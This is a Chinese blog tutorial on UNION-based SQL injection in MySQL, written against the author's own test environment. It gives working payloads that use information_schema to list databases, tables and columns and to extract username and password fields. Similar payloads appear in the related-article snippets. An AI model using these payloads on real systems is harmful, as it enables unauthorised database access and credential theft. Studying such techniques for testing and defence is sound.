sql注入之联合注入

最新推荐文章于 2024-04-08 10:02:51 发布
最新推荐文章于 2024-04-08 10:02:51 发布
阅读量608 收藏 3
点赞数
分类专栏: 漏洞专栏 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59576693/article/details/126940297
版权

声明:本文章只用于技术交流,若有用于其他用途导致不可逆的后果,本人概不负责; 本次交流所用数据库为自己搭建的环境。

一、什么是联合注入

        因为mysql查询语句中有联合查询这个功能(union 这个函数), 所以在进行sql注入的时候,利用 union 这个函数进行sql语句的拼接, 查询到我们想要的结果。

        条件: 网页上具有sql语句查询回显。

        

        1、联合查询(展示)

        

 

2、联合注入(展示)

 

 

其中 1,2,3 为我们想要查询的结果, 为什么为 select 1,2,3 因为 users 表只有三个字段。

id = -1 是因为我们不想要第一条查询语句的结果。

3、子语句查询

为什么要讲子语句查询呢?因为要用的到。

子语句查询: 在进行查询语句时,当作查询语句的 判断条件 或者作为 回显。

听不懂看下图 (查询当前数据库用户),select user() 为子语句查询。

4、payload

        列出所有数据库:

        

        limit 一个一个打印出来库名
                select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1

        group_concat 一次性全部显示
                select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
        
        只演示这一条

        

 

 列出(数据库:test)中所有的表:

             limit 一个一个打印出来字段名
                select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='test' limit 0,1

            group_concat 一次性全部显示
                select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='test'

列出(数据库:test 表:admin )中所有的字段:

        limit 一个一个打印出来
               select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='test' and TABLE_NAME='t10' limit 0,1
        
        group_concat 一次性全部显示
                select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

把 test 换成十六进制也可以查询  t10 也同理

列出(数据库:test 表:admin )中所有的字段内容:     

        limit 一个一个打印出来
                select username,passwd from test.admin limit 0,1

        group_concat 把 一次性全部打印
                select group_concat(concat(username,0x20,passwd)) from test.admin

谢谢各位看官老爷

波波莫瑞
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3167
SQL注入联合查询注入与报错注入
常见确认 SQL 注入漏洞方法总结
最新发布
Flag少侠的博客
04-08 1608
识别漏洞只是目标的一部分。最终目标是利用所测试应用中出现的漏洞。要实现该目标,您需要构造一条有效的SOL请求,它会在远程数据库中执行且不会引发任何错误。
MYSQL联合注入
qq_39654116的博客
01-04 251
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句 简介 联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截 特定变量 1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表 : 提供了关于数据库中的表的信息。 3\. C
sql注入详解
m0_67392811的博客
06-12 5654
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
渗透测试-SQL注入之union联合注入和报错注入
lza20001103的博客
04-18 2629
渗透测试-SQL注入之union联合注入和报错注入
sql注入中的联合注入
..
12-06 5978
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库是因为MYSQL会有一个系统数据库information_schema,能很快的通过几条注入语句获取到想要的数据。 UNION语法 mysql中,union用于将多个select语句的结果组合到一个结果集中,并删除结果集中的重复数据。 语法为: select column,...from tabl.
SQL注入中,为什么union联合查询,id必须等于0
分享与记录
05-11 1262
?id=0' union select 1,2,3 --+ ?id=0' union select 1,database(),3 --+ ?id=0' union select 1,database(),user() --+ 这里的 id 需要格外注意: 如果只有两个回显位置 那么 id 必须填写一个不存在的数(-1或者0),联合查询才能回显成功 因为在数据表中,id 为 1,2,3,…… 如果参数为: ?id=1' union select 1,2,3 --+ 那么查询语句就是: select *
SQL联合注入
黑黑的小鸭的博客
08-09 2201
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
SQL注入联合查询注入
qq_45691294的博客
07-11 7062
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
浅谈SQL注入中的-1‘ union select 1,2,3#
qq_23667585的博客
10-09 7743
超详细的介绍了SQL注入语句中的 -1' union select 1,2,3# 的含义
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL二次注入和截断联合使用
12-14
这次主要是说明sql的二次注入sql插入数据库时截断的问题而形成的一种特殊的注入手段,有时会有意想不到的效果。  sql二次注入  二次注入的原理也是非常的简单,在第一次进行数据库插入数据的时候,仅仅只是...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
CMS中sql注入联合查询,费心三小时制作!!!,超详细
SQL注入测试.zip
07-19
SQL注入测试.zip 具体操作步骤和说明文档。
sql注入知识---联合注入
尘玥的故事
04-12 169
username=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘l0ve1ysq1’#&password=123 //得到列名“id,username,password”username=-1’ union select 1,2,3#&password=123 //显示 Hello 2!username=1’&password=123 //报错。
sql注入基础
weixin_52657559的博客
10-27 1472
sql注入
sql注入 union联合查询注入(超详细)
热门推荐
jiji_king的博客
04-04 1万+
sql注入 union联合查询注入 我们以sqli-labs的第一关为例,来具体理解union联合查询注入的方法,理解每一步我为什么要这么去做。 好的,我们开始第一关! 首先查看sqli-labs第一关 这是第一关初始界面,在url界面输入?id=1 发现有回显,给我们回显了两个数据 当我们输入?id=1’ 时出现了语法错误,表示这里可能存在语法漏洞,我们进一步探索 当我们输入 ?id=1’ --+ 时,又回显正常,然后我们用 ?id=1’ and 1=1–+ 回显正常,?id=1’ and 1=2–
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值